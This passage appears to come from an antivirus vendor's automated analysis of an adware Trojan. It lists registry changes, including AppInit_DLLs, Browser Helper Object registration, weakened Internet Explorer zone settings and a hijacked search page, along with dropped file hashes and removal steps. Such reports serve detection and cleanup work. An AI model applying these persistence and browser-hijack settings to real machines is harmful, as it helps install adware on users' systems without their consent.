[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7f69fa1f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un /uq"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.1" = "PC ACFabcdefABCDWY"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Version" = "22022148"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"a0743acc" = "N/////%%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"daaabfc6" = "%Program Files%\TerminusKeeper\TerminusKeeper.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoModify" = "1"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Install_Dir" = "%Program Files%\TerminusKeeper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"uuid" = "8738532578695851691"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"State" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"587b5709" = "V/////%%"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 9A 19 6B 14 21 9D F0 2C 4E 39 6F 44 CC 42 F8"
The process rundll32.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
The process regsvr32.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"
"NoExplorer" = "1"
The process regsvr32.exe:1784 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"
"NoExplorer" = "1"
The process hpds_setup.exe:164 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"
Dropped PE files
MD5 | File path |
---|---|
5b4046db8f3c698418f9b2b51d8c292f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe |
2d3705d26f35d66e26b7300384bc01dc | c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.dll |
2e1bb4d22880abbf5df8f4343e16c356 | c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.exe |
c9456944ec1989ab0e2bf9e23df1c952 | c:\Program Files\CutaThePrice\CutaThePrice.exe |
f3cf89605ef83f1f6e4ffbfb8b6cef70 | c:\Program Files\TerminusKeeper\TerminusKeeper.dll |
635d528b505f4ffa3a6b4aea855c5001 | c:\Program Files\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe |
6e7027aac3d75239fa9684eb5a8863c4 | c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.dll |
34b46fb135e5264c60ddcf36b0c718bd | c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1304
%original file name%.exe:996
%original file name%.exe:592
%original file name%.exe:1936
%original file name%.exe:440
NybbleCrawler.xyz.exe:356
rundll32.exe:1256
regsvr32.exe:2008
regsvr32.exe:1784
hpds_setup.exe:164
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 47280 | 47616 | 4.40241 | 37d612d6a9acb8f84028f2746ecfb55f |
.rdata | 53248 | 141036 | 141312 | 5.41827 | 592d08be8b4356e664ca45751ece4f2c |
.data | 196608 | 28948 | 21504 | 0.904746 | 8c041560eefe8cbc360ca9f34a66f7b9 |
.rsrc | 229376 | 17904 | 17920 | 4.42194 | 70bd0d0b9733e9bf46a2af29c22a6241 |
.reloc | 249856 | 4766 | 5120 | 3.19352 | cac48ca405a5247f77ff5eb0ad24c76c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
